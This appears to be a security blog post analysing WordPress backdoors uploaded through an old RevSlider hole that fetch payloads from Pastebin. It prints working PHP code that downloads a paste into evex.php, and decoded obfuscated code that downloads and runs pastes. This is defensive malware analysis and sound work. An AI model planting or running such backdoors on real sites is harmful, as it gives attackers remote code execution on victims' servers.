Website Backdoors Leverage the Pastebin Service

3 minute read

We continue our series of posts about hacker attacks that exploit a vulnerability in older versions of the popular RevSlider plugin. In this post we’ll show you a different backdoor variant that abuses the legitimate Pastebin.com service for hosting malicious files.

Here’s the backdoor code:

if(array_keys($_GET)[0] == 'up'){
$content = file_get_contents("http://pastebin . com/raw.php?i=JK5r7NyS");
if($content){unlink('evex.php');
$fh2 = fopen("evex.php", 'a');
fwrite($fh2,$content);
fclose($fh2);
}}else{print "test";}

It’s more or less a typical backdoor. It downloads malicious code from a remote server and saves it in a file on a compromised site, making it available for execution. What makes this backdoor interesting is the choice of the remote server. It’s not being hosted on a hackers’ own site, not even a compromised site — now it’s Pastebin.com — the most popular web application for sharing code snippets.

Technically, the criminals used Pastebin for what it was built for – to share code snippets. The only catch is that the code is malicious, and it is used in illegal activity (hacking) directly off of the Pastebin website. Pastebin.com allows users to download the code in “raw” format (i.e. no HTML, no site UI, just the code — note the raw.php part of the URL).

Here’s an example of a slightly more elaborate backdoor, uploaded via the RevSlider hole:

Code-downloading backdoor from pastebin

Code-downloading backdoor from pastebin

In the screenshot, you can see that this code injects content of the Base64-encoded $temp variable at the top of the WordPress core wp-links-opml.php file. You can see the decoded $temp content below:

Decoded backdoor that uses pastebin

Decoded backdoor that uses pastebin

Again, you can see that some code is being downloaded from Pastebin.com, saved to a file and immediately executed. This time this only happens when the attacker provides the Pastebin snippet ID in the wp_nonce_once request parameter (which is also used as a file name when they save the downloaded code). The use of the wp_nonce_once parameter hides the URL of malicious pastes (which makes it difficult to block) and at the same time adds flexibility to the backdoor — now it can download and execute any Pastebin.com snippet — even those that don’t exist at the time of injection — you just need to pass their ID’s in the request to wp-links-opml.php.

FathurFreakz encoder

I should also mention that Indonesian hackers have an encoder that was made specifically to work with Pastebin.com. It is called PHP Encryptor by Yogyakarta Black Hat or by FathurFreakz. Basically, they create a paste of their PHP code on Pastebin.com and then specify the URL of the code in the encryptor, which then generates obfuscated code that looks like this:

Encoded specifically for Pastebin

Encoded specifically for Pastebin

If you decode it, you’ll see this:

function FathurFreakz($ct3){
xcurl('http://pastebin.com/download.php?i='.code($ct3));
}
FathurFreakz(CODE);

This code downloads and executes a Pastebin.com paste (xcurl function) with the ID encrypted in the CODE constant. Here, you can see that they use one more special Pastebin.com URL type, download.php, which acts similarly to raw.php, but also provides HTTP headers to prevent browsers from displaying the content to download it as a file instead.

By the way, that hacker group likes using Pastebin.com so much that some of their backdoors look like this (decoded):

Pastebin malware decoded

Pastebin backdoor decoded

Hackers and Pastebin

Pastebin has a long history of being used by hackers of all ranks. Many hacker groups share data stolen from famous companies via the service. Pastes are being used as an anonymous intermediary storage for data stolen from user computers. Some pastes are known to be used in malware attacks – they may contain encrypted addresses and even base64-encoded malicious binary code. Here’s just a few notable headlines from the last 5 years:

This time we see relatively massive use of Pastebin in live attacks, which is quite new to us. This also suggests that we, security researchers, should be more careful when sharing malicious code we find in public pastes – it is easy for hackers to reuse them directly from Pastebin.com. It would be a good idea, before sharing, to make some obvious modification to the code that would prevent its execution when downloaded in a raw format.

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